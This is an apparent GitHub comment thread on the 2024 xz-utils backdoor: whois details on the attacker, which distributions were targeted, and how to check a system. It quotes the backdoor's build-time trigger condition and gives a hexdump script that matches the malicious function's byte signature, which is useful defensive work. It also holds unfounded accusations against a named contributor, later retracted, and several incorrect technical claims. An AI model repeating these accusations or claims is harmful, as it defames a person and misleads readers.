[16:18:51] <oerheks> jiatan, Unstable
[16:20:13] <jiatan> oerheks: Thanks!
$ whois redacted-ip
netname:        M247-LTD-Singapore
descr:          M247 LTD Singapore Infrastructure

As per spur.us it's from Witopia VPN

Interesting..
Seems like our boy/girl/they/them is watching this unveil since last night.

Might have some proof

@DanielRuf
Copy link

@LaRevoltage exactly, I completely agree with you.

@xry111
Copy link

xry111 commented Mar 30, 2024

This attack was possible because the release manager was a malicious user. Quite the opposite I'm not a release manager of any project despite I've contributed to a dozen or two, so I cannot inject malicious code stealthy (i.e. bypassing a code review) like this.

EDIT: I'm also pretty sure I've not made any PR with binary blobs.

Thus instead of (or in addition to) accusing me, you should really consider those release managers more seriously.

And how could I know this guy had been malicious when I contributed to xz? I do all developing on Linux From Scratch where no RPMs or DEBs are used. So the malicious code was inactive and I couldn't ever noticed it (EDIT: unless my code happens to crash on this test payload, but it didn't happen). Then did I have any valid reason not to collaborate with the reviewer? Or am I free to say "hey I don't trust this reviewer, please assign another one" in the future with no evidence?! I'd be happy to do so if I was really allowed.

I'd like a security audition on all my contribution but I'd prefer someone to pay me some real money if they turn out clean, like I've commented in the PR.

BTW for the make-ca issue, we've been deliberately piping input data into openssl x509 command thus the warning is just noisy. There is even an OpenSSL issue complaining it. Simply silencing it with -in /dev/stdin is better than creating a temporary file because a temporary file would be easier to be compromised than the pipe buffer by other processes running on the system. This should be really obvious. Note that make-ca is only supposed to run on Linux so we can assume /dev/stdin is just the stdin.

@schkwve
Copy link

schkwve commented Mar 30, 2024

Relevant technical fact is that this exploit isn't on a level with information security skills of an average developer. Not only it uses smart tactic to hide itself from the commit inspection with autoconf, but also has a sophisticated payload nature, which we still can't reverse after 16 hours past the incident.
This is simply too good to be an exploit a normal developer wrote spontaneously. It looks much more like a planned attack, which raises question about third party interference.

But what now? All we can do is identify more about the backdoor, remove it, and hopefully find traces of the backdoor being used to further track down possible backdoors in other utilities.

@Exagone313
Copy link

I find it strange that they used the name jiatan for asking this question. If they had the trouble to use a VPN, they could have even used another name that don't have any connection to the situation. Or even they could have asked it two years ago if it's really a scheme that spanned for that long.

Though, as this is a public IRC channel, it could make Ubuntu maintainers suspicious if they find threads about updating a package connected to a Debian Unstable upgrade, from another name. Or not? You can use different nicknames on different places and it's not that strange.

@mburz
Copy link

mburz commented Mar 30, 2024

Is there any IRC channel or chat room where this issue is being discussed?
I can imagine there is a lot of interest in this.

@schauveau
Copy link

It seems to me that we should be optimistic on the idea that the payload is neither installing anything on the system nor calling home. Both would significantly increases the risk of being detected. A successful ssh backdoor is too valuable to risk.

Anyways, I assume that a lot of people are actively trying to analyze the payload. Does anyone know any good links showing progress?

I had a quick look at the offending object file but, at first glance, everything looks fine. The next step is probably to compare it to a genuine object file to spot the differences (e.g. which sections have different size).

@vlad-ivanov-name
Copy link

vlad-ivanov-name commented Mar 30, 2024

Note that some Debian package mirrors still provide xz-utils 5.6.1, below it's dated March 27th

https://mirror.yandex.ru/debian/pool/main/x/xz-utils/

The pattern from detect_sh.bin can be found in liblzma5/usr/lib/x86_64-linux-gnu/liblzma.so.5.6.1 at address 001047f0

@timrobbins1
Copy link

Lasse regularly has internet breaks and is on one at the moment, started before this all kicked off. We believe CISA may be trying to get in contact with him.

I don't think it's useful to point this out, as their last commit on Github was literally Tuesday this week - plougher/squashfs-tools#276

@hardfalcon
Copy link

@vlad-ivanov-name

Note that some Debian package mirrors still provide xz-utils 5.6.1, below it's dated March 27th

https://mirror.yandex.ru/debian/pool/main/x/xz-utils/

The official main mirror of the Debian project does still provide it, too:

It's possible that they simply don't have an established process for quickly removing malicious packages from their repo, and mirrors are just syncing/mirroring whatever is on the main server.

@zmej420
Copy link

zmej420 commented Mar 30, 2024

why does the gist push updating so hard when there is so much unknown? To me it sounds like the only sure shot for the moment is to reinstall with downgraded two years old xz and stop using patched opensshd. Unless you weren't affected, which most people weren't (quick check: run ldd $(which sshd) and see if liblzma is included, for me it's not, and xz --version is below 5.6 even though i'm pretty bleeding edge)

@LaRevoltage
Copy link

Relevant technical fact is that this exploit isn't on a level with information security skills of an average developer. Not only it uses smart tactic to hide itself from the commit inspection with autoconf, but also has a sophisticated payload nature, which we still can't reverse after 16 hours past the incident.
This is simply too good to be an exploit a normal developer wrote spontaneously. It looks much more like a planned attack, which raises question about third party interference.

But what now? All we can do is identify more about the backdoor, remove it, and hopefully find traces of the backdoor being used to further track down possible backdoors in other utilities.

That is actually the least we do.
Patching the backdoor and checking traces of this maintainer will help to recover from this incident. It will not help us any further. This once again alarms us of the problem with developing and maintaining big project's on the base of free and open source principals. What we need is a new policy, that will prevent, or make such incidents less likely. For instance, I believe that system of checks and balances must be in place. You don't give person write permission to main branch even if they have been pushing commits for 2 years without conducting any research on their affiliations, that is by default a security concern, because, even though the commits are expected to be inspected, it just so happens that people tend to just ignore the part of code they don't understand, which never should be a case. If the malicious actor had tried to push this PR to most corporate open sourced tools, he would have miserably failed, because no one would have allowed it to pass without understanding the actual inner working of the code, no matter the previous PRs. I also doubt, that anyone would get write permissions to main branch of that project without prior checks. In my opinion the open sourced code under a real company is the best strategy for such critical repositories, and not a blind believe, that the volunteering contributors and maintainers from the community will be able to inspect and understand every commit and change, as well as to determine the trustworthiness of an unknown person on the web. This closely intersects with a problem and a running joke in the open source community - that the whole tech is holding on a personal project which 2 people who have been maintaining that project for years without any pay. This is what enables NSA and other 3d parties with resources to compromise entirety of the infrastructure. Because such projects with lenient policies are the weak link of the whole system

@mrkubax10
Copy link

Is there any IRC channel or chat room where this issue is being discussed?

It would be cool.

@konimex
Copy link

konimex commented Mar 30, 2024

Is there any IRC channel or chat room where this issue is being discussed? I can imagine there is a lot of interest in this.

The #tukaani channel on Libera is pretty active right now with Larhzu now active again.

Also, the incident has been acknowledged: https://tukaani.org/xz-backdoor/

@charlesgoyard
Copy link

but I'd follow the advice from @erinacio and @xen0n and submit requests for audit in any number of projects you see fit

How do these security audits work? I've never heard of security audits in OSS before.

Hi, you can search for the Veracrypt security audit as an example, or read the public report.

@sommio
Copy link

sommio commented Mar 30, 2024

@lhmouse @cwegener the country is probably a false flag. A VPN is meant to make it look like you are from a different country.

It's not the first time I had a case where a hacker used a VPN to conceal their true country. The IP address pointed to a completely different country. So that's why we should not jump to conclusions here.

Any serious security expert does not do that. Attribution is hard and not like "look, this was the IP address, so they are in this country".

It can only hide IP, real Singaporeans won't use this kind of host ASN to surf the net, it can't even watch Netflix. No one will believe he is a Singaporean.

@everything411
Copy link

We cannot even determine whether Jia Tan is an individual person or a hacker group.

Fake name and VPN ip address cannot indicate any real information about the hacker(s) behind the account.

@paulfloyd
Copy link

GNU libc isn't the only libc using ifuncs. Certainly FreeBSD libc recently added ifuncs for str* and mem* functions recently. macOS has platform variants but I don't know how they got resolved.

@Z-nonymous
Copy link

It could be anyone, NSA, criminals, terrorists, even a highly motivated individual. Again, I want apologize if in the suspicious activity I may have upset some honest contributors, they can have been tricked in fixing engineered bug that aims at validating a bad PR.

I'm glad I'm not the only one having real converns over this. @LaRevoltage even mentionned a lot of the things I omitted to try to stick to the point.

For the context, kernel dev for commercial UNIX experience 25 years ago, unfortunately not familiar enough with Linux kernel. Even in large companies few people have the depth of knowledge to maintaining of a very wide knowledge to cover all OS. People are all specialised on one component. Once can get easily tricked into fixing what is reported as a bug when in fact it's been a problem injected somewhere else. It's the very common case of fixing a side effect where it appears instead of where it is caused.

The Backdoor specifically targets building from the release. That targets Gentoo, LFS. xry111 is part of that LFS community. xry111 says he's not a maintainer of xz. Sure he isn't, he can somehow commit on systemd, targeted by this backdoor (when ssh on systemd).
This is suspicious removing pure from a function declaration. a Pure function are a sanity check for build time flags so that we know the function isn't supposed to change any variable or IO. Now it's gone. Compiler can make specific more complex optimizations now at build time.

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395.
Now systemd bus_message_type_from_string(const char *s, uint8_t *u) be changed to modify parameters or globals variables or do IO.
But somehow nobody worried, it gets bundled with other 'sheanigans', and it's in systemd for future use.... Niw if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

ALso targeting gentoo and LFS, then all those seemingly infossenive LLVM changes cmake changes to address random bugs maybe not reproduced, just reported by someone also advising how to fix it...

I don't have much time to review all this today, there's too much. Given the sophistaction for the actual payload to be triggered, this has to be part of a larger scheme to compromise Linux.

Somehow, using this:
https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPTSBnaXRodWJfZXZlbnRzIFdIRVJFIGFjdG9yX2xvZ2luPSd4cnkxMTEnIE9SREVSIEJZIGZpbGVfdGltZSBERVND

we can use:
SELECT DISTINCT repo_name FROM github_events WHERE actor_login='xry111' ORDER BY file_time DESC

for all users of the community and check all their repos and how much overlap.

I'm not saying anyone is guilty, people may be tricked/engineered into making changes by bad actors. Maybe just one bad actor - to be indentified - is tricking people from this group, maybe just one person is a bad actor. Maybe all is fine. but the mere fact that they are touching so many core component of Linux security is of a big concern.

Quick glance at the type of changes, they are related to "adding test" ah this is innofnesive right and removing warnings, changing things that are even not just for Loongson architecture...

There are hundreds of repos that to be audited now to examine this group's contributions. Even though maybe they are just tricked by false bugs.

@timtas
Copy link

timtas commented Mar 30, 2024

xry

What about this Open PR tukaani-project/xz#86 with several force-push from 27 days ago?

I see JiaT75 account working with another user account (xry111) on further CRC changes (crc changes that are currently exploited), and that user has also contributed to many core linux subsystems like openssl and systemd, protobuf-c. llvms, util-linux. torvalds/linux, make-ca, cpython... xry111 has submitted PRs and commits and alo reviewer of PRs in many places. 16 repo contributed to this year, 47 repos in 2023, 38 in 2024.

He seems to be participating to Loongsong Chinese architecture and Linux From Scratch, though, which might explain his wide contributions, but SSL, CRC, Make, Building, Kernel, curl, libxcrypt... , that's a lot of places where he is contributing code or reviewing code. Wouldn't that allow for very sophisticated similar exploits ?

I did not review all but I see some make-ca update to silence openssl warnings...

Well, I'm also contributing to Linux From Scratch and therefore "know" xry111 quite well from various conversations. While he really is terribly productive and frightfully competent in various areas, I can assure you that he certainly is not part of any conspiracy here, but a real person. I personally vouche for him that he takes no part whatsoever in this backdoor issue.

@Z-nonymous
Copy link

Ifunc also they touched

@sommio
Copy link

sommio commented Mar 30, 2024

from Witopia VPN

Probably just one in a gazillion of VPN providers that allows you to use the Internet from mainland China.

We don't use this kind of VPN and usually use proxy protocols designed to bypass national firewalls
in conjunction with rule-based proxy client (eg.sing-box, Surge) .

The provider delivers it in the form of providing a proxy url and key, similar to how socks5 proxy providers are delivered.

@Z-nonymous
Copy link

Well, I'm also contributing to Linux From Scratch and therefore "know" xry111 quite well from various conversations. While he really is terribly productive and frightfully competent in various areas, I can assure you that he certainly is not part of any conspiracy here, but a real person. I personally vouche for him that he takes no part whatsoever in this backdoor issue.

Thanks, I know about the LFS community for a while, I use Linux since 25+ years. I don't say there are necessarily bad actors. Are you able to understand exactly what Andres Freund disclosed in details ?
I put more details later than the post you quoted in this gist.
Can you vouch for his commit on systemd and understand the implications this entails ?

@duracell
Copy link

duracell commented Mar 30, 2024

@Z-nonymous

It could be anyone, NSA, criminals, terrorists, even a highly motivated individual. Again, I want apologize if in the suspicious activity I may have upset some honest contributors, they can have been tricked in fixing engineered bug that aims at validating a bad PR.

Or they just fixed real bugs.

I'm glad I'm not the only one having real converns over this. @LaRevoltage even mentionned a lot of the things I omitted to try to stick to the point.

Having concerns over "this" and doing wild accusations are two complete different things. It's good to get a clear picture and checking every corner, but to accuse somebody without ANY proof is not helpful and will get you ignored.

The Backdoor specifically targets building from the release. That targets Gentoo, LFS.

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither are using this package formats. Gentoo also don't patch openssh with systemd-notify. So the current known exploit path is not working on gentoo at all.

So please, don't push against people and don't write something which is clearly wrong.

@LaRevoltage
Copy link

@Z-nonymous

It could be anyone, NSA, criminals, terrorists, even a highly motivated individual. Again, I want apologize if in the suspicious activity I may have upset some honest contributors, they can have been tricked in fixing engineered bug that aims at validating a bad PR.

Or they just fixed real bugs.

I'm glad I'm not the only one having real converns over this. @LaRevoltage even mentionned a lot of the things I omitted to try to stick to the point.

Having concerns over "this" and doing wild accusations are two complete different things. It's good to get a clear picture and checking every corner, but to accuse somebody without ANY proof is not helpful and will get you ignored.

Sorry? I didn't accuse any individual, all what I did, was point, that it is unlikely that such sophisticated delivery and payload are made by a developer with regular exploitation knowledge. And that was my reply to the initial commit to xz, not the systemd the OP is talking about.

@timtas
Copy link

timtas commented Mar 30, 2024

Loongson

It could be anyone, NSA, criminals, terrorists, even a highly motivated individual. Again, I want apologize if in the suspicious activity I may have upset some honest contributors, they can have been tricked in fixing engineered bug that aims at validating a bad PR.

I'm glad I'm not the only one having real converns over this. @LaRevoltage even mentionned a lot of the things I omitted to try to stick to the point.

For the context, kernel dev for commercial UNIX experience 25 years ago, unfortunately not familiar enough with Linux kernel. Even in large companies few people have the depth of knowledge to maintaining of a very wide knowledge to cover all OS. People are all specialised on one component. Once can get easily tricked into fixing what is reported as a bug when in fact it's been a problem injected somewhere else. It's the very common case of fixing a side effect where it appears instead of where it is caused.

The Backdoor specifically targets building from the release. That targets Gentoo, LFS. xry111 is part of that LFS community. xry111 says he's not a maintainer of xz. Sure he isn't, he can somehow commit on systemd, targeted by this backdoor (when ssh on systemd). This is suspicious removing pure from a function declaration. a Pure function are a sanity check for build time flags so that we know the function isn't supposed to change any variable or IO. Now it's gone. Compiler can make specific more complex optimizations now at build time.

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395. Now systemd bus_message_type_from_string(const char *s, uint8_t *u) be changed to modify parameters or globals variables or do IO. But somehow nobody worried, it gets bundled with other 'sheanigans', and it's in systemd for future use.... Niw if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

ALso targeting gentoo and LFS, then all those seemingly infossenive LLVM changes cmake changes to address random bugs maybe not reproduced, just reported by someone also advising how to fix it...

I just looked at this systemd issue and fix, and from what I see, it was a real, reproducible hang and several (not totally random) compiler versions/architechture combinations.

xry111 does contribute quite a lot on Linux From Scratch, but hardly ever creates patches on his own, and while he certainly is repsonsible for a lot of changes, they are all quite sensible, well-reasoned and reproducible. They also never have anything to do whith this Loongson thingy. Regarding systemd, he pushed through the switch from eudev to systemd-udev, as eudev was badly maintained, and while I did not like it, I had to agree that it makes sense. He likes systemd, while I hate it, but even that, while clearly obvious, never became an issue. I'd be very, very surprised if he had anything to do with that backdoor.

@xry111
Copy link

xry111 commented Mar 30, 2024

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395. Now systemd bus_message_type_from_string(const char *s, uint8_t *u) be changed to modify parameters or globals variables or do IO. But somehow nobody worried, it gets bundled with other 'sheanigans', and it's in systemd for future use.... Niw if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

What? Do you really understand what the pure attribute does?

It is an optimization attribute, not a diagnostic attribute. It means the programmer guarantees that the function does not modify the global state, not the compiler guarantees that.

Ideally it should be both an optimization attribute and a diagnostic attribute, but the diagnostic is not implemented yet: https://gcc.gnu.org/PR18487

So if you use pure attribute on a non-pure function, the compiler will not emit any diagnostics and it will silently generate broken code.

@Z-nonymous
Copy link

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither are using this package formats. Gentoo also don't patch openssh with systemd-notify. So the current known exploit path is not working on gentoo at all.

So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was innacurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use gentoo or LFS. since you're building all from source. Not sure where these "distro" get the source from, do they download releases from github ? Release that is specifically payloaded...

@waterkip
Copy link

Somehow xry111 removes that on the pretense that some random person mentions a bug with systemd hanging on Linux using specific versions of this and that... See associated PR systemd/systemd#27595 for issue systemd/systemd#26395. Now systemd bus_message_type_from_string(const char *s, uint8_t *u) be changed to modify parameters or globals variables or do IO. But somehow nobody worried, it gets bundled with other 'sheanigans', and it's in systemd for future use.... Niw if we change bus_message_type_from_string(const char *s, uint8_t *u) it won't trigger sanity checks that something bad happened.

It seems like that random person made a lot of effort to reproduce a bug and bisect it. I don't agree with you.

@duracell
Copy link

@Z-nonymous

It could be anyone, NSA, criminals, terrorists, even a highly motivated individual. Again, I want apologize if in the suspicious activity I may have upset some honest contributors, they can have been tricked in fixing engineered bug that aims at validating a bad PR.

Or they just fixed real bugs.

I'm glad I'm not the only one having real converns over this. @LaRevoltage even mentionned a lot of the things I omitted to try to stick to the point.

Having concerns over "this" and doing wild accusations are two complete different things. It's good to get a clear picture and checking every corner, but to accuse somebody without ANY proof is not helpful and will get you ignored.

Sorry? I didn't accuse any individual, all what I did, was point, that it is unlikely that such sophisticated delivery and payload are made by a developer with regular exploitation knowledge. And that was my reply to the initial commit to xz, not the systemd the OP is talking about.

Sorry, it just pinged you because of the quote from Z-nonymous. I meant this person with my reply.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

What? Do you really understand what the pure attribute does?

It is an optimization attribute, not a diagnostic attribute. It means the programmer guarantees that the function does not modify the global state, not the compiler guarantees that.

Ideally it should be both an optimization attribute and a diagnostic attribute, but the diagnostic is not implemented yet: https://gcc.gnu.org/PR18487

So if you use pure attribute on a non-pure function, the compiler will not emit any diagnostics and it will silently generate broken code.

Ooooh commercial Unix here from 25 years ago, so it was different back in my days with non-GNU compiler.

@xry111
Copy link

xry111 commented Mar 30, 2024

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither are using this package formats. Gentoo also don't patch openssh with systemd-notify. So the current known exploit path is not working on gentoo at all.
So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was innacurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use gentoo or LFS.

The obfuscated script only do things when building a .deb or .rpm package. We don't do it for LFS so the script is basically latent.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

It seems like that random person made a lot of effort to reproduce a bug and bisect it. I don't agree with you.

Thanks; I didn't know pure wasn't triggering on GNU C anyway. Not sure about code checkers some repos might have as to validate code.

@timtas
Copy link

timtas commented Mar 30, 2024

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither are using this package formats. Gentoo also don't patch openssh with systemd-notify. So the current known exploit path is not working on gentoo at all.
So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was innacurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use gentoo or LFS. since you're building all from source. Not sure where these "distro" get the source from, do they download releases from github ? Release that is specifically payloaded...

Yes, "we" (LFS) dowload the source directly from upstream, this can be github, kernel.org or whatever. On github, it is usually the created tarballs, so LFS "was" affected, but only the very early adapters of the devel version of the book, and only the systemd folks, LFS has a sysv and a systemd variant. I was not affected, as I'm still on xz 5.4.1, and on sysv.

As for how packages are installed: LFS explicitely is no distro, but a book that describes how to create a Linux system. Therefore, the book goes for:

./configure
make
make install

or the meson/ninja equivalent.

A lot of people (including me) however integrate a package manager for installation, I use my own, I doubt anyone uses dpkg or rpm.

@znkkw
Copy link

znkkw commented Mar 30, 2024

From the perspective of Loongson Company, there is no reason for them to extensively modify the fundamental components of Linux merely to add a backdoor. Maybe we should just stop accusing specific country, company, And just focus on this person who write this; and how to stop this.

In the end of the day, this project was maintained by one single individual, a single point of failure

@duracell
Copy link

duracell commented Mar 30, 2024

So that's how packages are installed if you use gentoo or LFS. since you're building all from source. Not sure where these "distro" get the source from, do they download releases from github ? Release that is specifically payloaded...

If you use e.g., Debian, they built it on their server and then distribute the deb package.
I'm not sure which source they usually do, but the bad actor puts a warning in, that the source packages should not be used. I think to convince the maintainer to use the release tar-balls.

With:

  • the .deb and .rpm checks in the exploit code
  • the pushing to update to the current version in at least the ubuntu mailinglist
  • asking in the irc about relase mechanism

it's clearly the case that the main target are these deb/rpm based distributions.

So again, please be calm. It's okay to ask, but you throw so much stuff around, it's not helpful.

@xry111
Copy link

xry111 commented Mar 30, 2024

That's totally wrong. If you read the gist and/or the original post, you would learn that it targets the building of .deb and .rpm files. Neither are using this package formats. Gentoo also don't patch openssh with systemd-notify. So the current known exploit path is not working on gentoo at all.
So please, don't push against people and don't write something which is clearly wrong.

Right, my comment was innacurate.

This injects an obfuscated script to be executed at the end of configure. This
script is fairly obfuscated and data from "test" .xz files in the repository.

So that's how packages are installed if you use gentoo or LFS. since you're building all from source. Not sure where these "distro" get the source from, do they download releases from github ? Release that is specifically payloaded...

Yes, "we" (LFS) dowload the source directly from upstream, this can be github, kernel.org or whatever. On github, it is usually the created tarballs, so LFS "was" affected, but only the very early adapters of the devel version of the book, and only the systemd folks, LFS has a sysv and a systemd variant. I was not affected, as I'm still on xz 5.4.1, and on sysv.

As for how packages are installed: LFS explicitely is no distro, but a book that describes how to create a Linux system. Therefore, the book goes for:

./configure make make install

or the meson/ninja equivalent.

A lot of people (including me) however integrate a package manager for installation, I use my own, I doubt anyone uses dpkg or rpm.

And even on systemd we don't patch sshd for systemd notification. The instruction is here:

https://www.linuxfromscratch.org/blfs/view/systemd/postlfs/openssh.html

We just tell people to download the upstream release and build it, w/o patching.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo)
Sorry for beein incorrect.

@xry111
Copy link

xry111 commented Mar 30, 2024

he can somehow commit on systemd

I cannot. The PR was reviewed and merged by @yuwata.

This page even says: xry111 authored and yuwata committed on May 10, 2023.

@xry111
Copy link

xry111 commented Mar 30, 2024

It seems like that random person made a lot of effort to reproduce a bug and bisect it. I don't agree with you.

Thanks; I didn't know pure wasn't triggering on GNU C anyway. Not sure about code checkers some repos might have as to validate code.

It had not (or the issue would have been found by the checker and fixed before systemd hangs on my machine). Not sure about the status quo.

@duracell
Copy link

duracell commented Mar 30, 2024

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for beein incorrect.

No.
The code is:
if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then
which is testing if you're building for a debian or rpm package!
So it's not "build rpm or deb or anything", it's "build rpm or deb", no anything.
Please, read the initial posting (or even the gist, it's also in there).

Again, if you don't know, ask questions, but don't assume things which are already known better.
Or, if you know things which are not yet in the original message or the gist, or which prove them wrong, post them.
Nearly all of your comments were wrong. Be more careful. Please!

@timtas
Copy link

timtas commented Mar 30, 2024

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for beein incorrect.

Well, as it stands now, only rpm and dep based distros are targeted, and neither Gentoo or LFS go in that category. As I said, I doubt very much any LFS user uses dkpg or rpm, and as xry111, we don't even use the the systemd notification patch for openssh.

I can assure you 100% percent that xry111 would have had the chance to put this patch into the book, but he didn't, 100%. Do you need more proof?

@Z-nonymous
Copy link

And even on systemd we don't patch sshd for systemd notification. The instruction is here:

https://www.linuxfromscratch.org/blfs/view/systemd/postlfs/openssh.html

We just tell people to download the upstream release and build it, w/o patching.

Yes there's multiple layers for it to work; many requirements in many places. Maybe it's targeting more specific systems than initially thought.

Still the backdoor vector is ssh (openssl), xv/crc, systemd. when you made contributions there.

I can't see PR86 anymore it seemed lgtm from not beeing familiar with the code, but since detected bad actor on xv package approved some changes to crc code while the crc seem to be used here for the attack.
One can emit the hypothesis (that can't be proven) that it could have well be to get you in and you only put in further code in there later.

@StefanCristian
Copy link

it's clearly the case that the main target are these deb/rpm based distributions.

Well, the target is actually anyone who builds from code, so any distro that will build rpm or deb or anything, and anyone building from scratch (LFS/gentoo) Sorry for beein incorrect.

No, the attacker's target were deb and rpm distros, since they're mainly the ones who patched SSHD for systemd-notifications.

Read https://www.openwall.com/lists/oss-security/2024/03/29/4

The source-based distros are the main enemies here for the attackers, because they're the ones most prone to find these problems. Thanks to @xry111 's contributions in these areas the systems will be much more hardened from now on.

Your accusations are quite dubious, since we're talking about a anonymous attacker in cahoots with a very known & public contributor.
We can very well ask about your interest in keeping these unfounded accusations alive, feels like your intentions are less than noble.

@xry111
Copy link

xry111 commented Mar 30, 2024

I can't see PR86 anymore

https://paste.mozilla.org/ynf2jvsh for auditors. I've not modified a thing since it was approved.

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

I cannot. The PR was reviewed and merged by @yuwata.

This page even says: xry111 authored and yuwata committed on May 10, 2023.

I know You can not merge but you can commit.
I saw @yumata merge it along with some other commits.

Maybe he can tell what he things of changing a function that's supposed to be pure to be changed to regular function.

@Ninpo
Copy link

Ninpo commented Mar 30, 2024

And even on systemd we don't patch sshd for systemd notification. The instruction is here:
https://www.linuxfromscratch.org/blfs/view/systemd/postlfs/openssh.html
We just tell people to download the upstream release and build it, w/o patching.

Yes there's multiple layers for it to work; many requirements in many places. Maybe it's targeting more specific systems than initially thought.

Still the backdoor vector is ssh (openssl), xv/crc, systemd. when you made contributions there.

I can't see PR86 anymore it seemed lgtm from not beeing familiar with the code, but since detected bad actor on xv package approved some changes to crc code while the crc seem to be used here for the attack. One can emit the hypothesis (that can't be proven) that it could have well be to get you in and you only put in further code in there later.

I'd pay good money if you'd shut up

@xry111
Copy link

xry111 commented Mar 30, 2024

I cannot. The PR was reviewed and merged by @yuwata.
This page even says: xry111 authored and yuwata committed on May 10, 2023.
I know You can not merge but you can commit.
I saw @yumata merge it along with some other commits.

Maybe he can tell what he things of changing a function that's supposed to be pure to be changed to regular function.

Because it isn't supposed to be pure (in GNU C).

The entire systemd project relies on GNU extensions so non-GNU compilers just won't work. Please don't quote specs from other compilers.

@Z-nonymous
Copy link

Ok, so I'll apologize here, for just coming with suspicions instead of actual proofs. As one said I should have asked questions for some of the details, and my attitude was not correct.

@kbahey
Copy link

kbahey commented Mar 30, 2024

Does anyone know if Ubuntu 22.04 Server is affected, or what command I could run to know if I am affected? I'm not familiar with detecting installed library versions.

Like you, I am also running 22.04 LTS.

I think it is not affected, based on the the following:

First:

$ dpkg -l | grep lzma
ii  liblzma5:amd64 5.2.5-2ubuntu1

The version of xz is 5.2.5. The exploit was first introduced in 5.6.

Second:

if hexdump -ve '1/1 "%.2x"' /lib/x86_64-linux-gnu/liblzma.so.5 | 
grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then  
  echo "Probably vulnerable"
else 
  echo "Likely not vulnerable"
fi

This shell script shows that the library does not have the exploit's malicious function signature.

One reason I stay with LTS releases only is to reduce the amount of change in a given time period.

@schkwve
Copy link

schkwve commented Mar 30, 2024

I know You can not merge but you can commit.

That's how contributing works though... You fork a repository, commit to the forked repository, and open a PR (ask the original repository maintainers to merge the two branches together).

@dguglielmi
Copy link

dguglielmi commented Mar 30, 2024

Lasse Collin have published a page https://tukaani.org/xz-backdoor/

I think he spotted something else targeting cmake builds (in future)

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=f9cf4c05edd14dedfe63833f8ccbe41b55823b00

@duracell
Copy link

why does the gist push updating so hard when there is so much unknown? To me it sounds like the only sure shot for the moment is to reinstall with downgraded two years old xz and stop using patched opensshd. Unless you weren't affected, which most people weren't (quick check: run ldd $(which sshd) and see if liblzma is included, for me it's not, and xz --version is below 5.6 even though i'm pretty bleeding edge)

Be careful with ldd, read "Please do not use ldd on untrusted binaries" from the gist. There is a detect.sh script which should be used instead.

@xry111
Copy link

xry111 commented Mar 30, 2024

why does the gist push updating so hard when there is so much unknown? To me it sounds like the only sure shot for the moment is to reinstall with downgraded two years old xz and stop using patched opensshd. Unless you weren't affected, which most people weren't (quick check: run ldd $(which sshd) and see if liblzma is included, for me it's not, and xz --version is below 5.6 even though i'm pretty bleeding edge)

Be careful with ldd, read "Please do not use ldd on untrusted binaries" from the gist. There is a detect.sh script which should be used instead.

But the script invokes ldd too :(

# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

However I don't know in this case we may consider sshd "trusted" or not (liblzma.so is definitely untrusted).

We can use readelf -d /usr/sbin/sshd which will show libsystemd if the systemd-notify patch used. Note that running readelf -d on untrusted binaries is also dangerous (the Binutils maintainers say it's unsafe to do so w/o sandboxing), but we may consider sshd trusted here (liblzma.so is definitely untrusted)...

@Z-nonymous
Copy link

Z-nonymous commented Mar 30, 2024

That's how contributing works though... You fork a repository, commit to the forked repository, and open a PR (ask the original repository maintainers to merge the two branches together).

Yes, I know, I only checked some PR/commits, and some of same group of persons seem to approve each other's PR, from random incoming bugs. but they might very well be legit anyway. I have seen mostly good commits and PRs anyway. But it's taking a huge time.

So for now I'm assuming I'm completely wrong, and I was paranoid. I'll try to do spend proper time to review or leave it to each maintainer to check code.

Again I apologize for the inappropriate conduct I had.

@Baadvo
Copy link

Baadvo commented Mar 30, 2024

@duracell
Copy link

But the script invokes ldd too :(

# find path to liblzma used by sshd
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"

What? That's odd, I looked at a detect script which didn't use ldd. Sorry, then I mixed it up with this one. :(
Thanks for the clarification!

@vlad-ivanov-name
Copy link

Regarding this signature:

f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410

